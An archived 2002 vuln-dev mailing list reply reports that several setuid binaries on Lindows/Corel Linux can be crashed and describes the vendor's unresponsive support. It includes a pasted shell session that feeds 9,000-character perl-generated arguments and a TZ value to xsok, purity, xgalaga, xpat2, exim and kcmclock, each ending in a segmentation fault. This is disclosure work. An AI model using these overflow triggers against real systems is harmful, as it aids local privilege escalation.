Re: Lindows Issues
From: KF (dotslash@snosoft.com)Date: 07/18/02
- Previous message: McAllister, Andrew: "RE: Lindows Issues"
- In reply to: sec daddy: "Lindows Issues"
- Next in thread: H C: "Re: Lindows Issues"
- Reply: H C: "Re: Lindows Issues"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 18 Jul 2002 10:55:54 -0400 From: KF <dotslash@snosoft.com> To: sec daddy <secdaddyb@yahoo.com>, vuln-dev@security-focus.com
Yes... we found about 7 or 8 suids to be exploitable in the default
config (local only so not any real threat...I don't believe its supposed
to be multi-user really)... they were reported to Lindows.com. Lindows
is based on Xandros linux so you may find that auditing Xandros will
reveal alot about Lindows. They (Lindows) SUCK on security type
responses is all I know ... they NEVER really got back to me. They
marked my case as "Solved" after they replyed "we will get back with you
shortly"for the 2nd time.
* Response (Evan)* 06/17/2002 10:15 AM
Thank you for the email. We are working on this and will get back with
you shortly.
* Customer (Kevin Finisterre)* 06/17/2002 10:15 AM
I forwarded several security issues on to your staff and only recieved
one reply... what is the status of these issues? *
Question Reference #020526-000013*
-KF
* Question Reference #020617-000051*
*Contact Information: * dotslash@snosoft.com
*Date Created: * 06/17/2002 10:15 AM
*Last Updated: * 06/24/2002 04:08 PM
*Status: * Solved
elguapo25:/home/elguapo# uname -a
Linux elguapo25 2.2.16 #1 Tue Jul 18 16:07:55 EDT 2000 i686 unknown
elguapo25:/home/elguapo# cat /etc/issue
Corel LINUX 1.2 (\l)
elguapo25:/home/elguapo# cat /etc/motd
Linux elguapo25 2.2.16 #1 Tue Jul 18 16:07:55 EDT 2000 i686 unknown
Copyright (C) 1993-1999 Software in the Public Interest, and others
Most of the programs included with the Debian GNU/Linux system are
freely redistributable; the exact distribution terms for each program
are described in the individual files in /usr/doc/ */copyright
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
elguapo25:~# /usr/games/xsok -xsokdir `perl -e 'print "A" x 9000'`
Segmentation fault
elguapo25:~# /usr/games/purity `perl -e 'print "A" x 9000'`
Segmentation fault
elguapo25:~# /usr/games/xgalaga -level `perl -e 'print "1" x 9000'`
xgal.sndsrv: Couldn't open DSP /dev/dsp
xgal.sndsrv: Sound not available
Segmentation fault
elguapo25:~# /usr/games/xpat2 -xpmdir `perl -e 'print "A" x 9000'`
FAILED to open keyboard file "/usr/lib/games/xpat/C/keys"
Segmentation fault
elguapo25:~# /usr/sbin/exim -C `perl -e 'print "A" x 9000'`
Segmentation fault
elguapo25:~# export TZ=`perl -e 'print "A" x 9000'`
elguapo25:~# /usr/X11R6/bin/kcmclock
Segmentation fault
-KF
sec daddy wrote:
>Has anyone done research on the security of Lindows?
>There appear to be application level exploits with MS
>programs that run on Lindows, consistent with Windows.
> I'm more curious about O/S level exploits.
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Autos - Get free new car price quotes
>http://autos.yahoo.com
>
>
- Previous message: McAllister, Andrew: "RE: Lindows Issues"
- In reply to: sec daddy: "Lindows Issues"
- Next in thread: H C: "Re: Lindows Issues"
- Reply: H C: "Re: Lindows Issues"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
